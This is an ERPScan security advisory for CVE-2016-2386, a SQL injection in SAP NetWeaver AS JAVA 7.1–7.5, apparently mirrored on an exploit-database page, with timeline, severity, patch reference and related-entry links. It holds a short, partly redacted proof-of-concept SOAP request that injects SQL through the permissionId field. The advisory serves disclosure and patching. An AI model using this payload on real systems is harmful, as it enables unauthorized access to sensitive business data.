Lucene search
ERPScan1337DAY-ID-25051HistoryMay 19, 2016 - 12:00 a.m.
SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection
2016-05-1900:00:00
ERPScan
0day.today
494
0.332 Low
EPSS
Percentile
97.1%
Exploit for java platform in category web applications
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
Vendor URL: http://SAP.com
Bugs: SQL injection
Send: 04.12.2015
Reported: 04.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 09.02.2016
Reference: SAP Security Note 2101079
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP NetWeaver AS JAVA – SQL injection vulnerability
Advisory ID: [ERPSCAN-16-011]
Risk: Critical
Advisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
Date published: 09.02.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: SQL injection
Impact: Resource consumption
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: 2016-2386
CVSS Information
CVSS Base Score v3: 9.1 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Low (L)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High(H)
A : Impact to Availability None (N)
3. VULNERABILITY DESCRIPTION
An SQL injection vulnerability means that a code comprises an SQL
statement that contains strings that can be altered by an attacker.
The manipulated SQL statement can be used to gain additional data from
the database or to modify the information.
4. VULNERABLE PACKAGES
SAP NetWeaver AS JAVA 7.1 - 7.5
Other versions are probably affected too, but they were not checked.
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2101079
6. AUTHOR
Vahagn Vardanyan (ERPScan)
7. TECHNICAL DESCRIPTION
By exploiting this vulnerability, an internal or external attacker can
escalate their privileges. This access allows obtaining sensitive
technical and business-related information stored in the vulnerable
SAP system.
PoC
POST /XXX/UDDISecurityImplBean HTTP/1.1
Content-Type: text/xml
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
XXX
<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or
'1'='1</permissionId>
XXX
</SOAP-ENV:Envelope>
8. REPORT TIMELINE
Sent: 04.12.2015
Reported: 04.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 09.02.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
# 0day.today [2018-03-14] #Related
cvelist
cvelist
CVE-2016-2386
2016-02-16 15:00:00
cve
cve
CVE-2016-2386
2016-02-16 15:59:00
attackerkb
attackerkb
CVE-2016-2386
2016-02-16 00:00:00
checkpoint_advisories
checkpoint_advisories
SAP NetWeaver J2EE Engine SQL Injection (CVE-2016-2386)
2022-06-20 00:00:00
cisa_kev
cisa_kev
SAP NetWeaver SQL Injection Vulnerability
2022-06-09 00:00:00
prion
prion
Sql injection
2016-02-16 15:59:00
packetstorm
packetstorm
SAP NetWeaver AS JAVA 7.5 SQL Injection
2016-05-19 00:00:00
SAP NetWeaver J2EE Engine 7.40 SQL Injection
2018-01-12 00:00:00
nvd
nvd
CVE-2016-2386
2016-02-16 15:59:00
zdt
zdt
SAP NetWeaver J2EE Engine 7.40 - SQL Injection Exploit
2018-01-11 00:00:00
openvas
openvas
SAP NetWeaver AS Java Multiple Vulnerabilities (2101079, 2191290, 2256846)
2016-05-23 00:00:00
exploitpack
exploitpack
SAP NetWeaver J2EE Engine 7.40 - SQL Injection
2018-01-10 00:00:00
exploitdb
exploitdb
SAP NetWeaver J2EE Engine 7.40 - SQL Injection
2018-01-10 00:00:00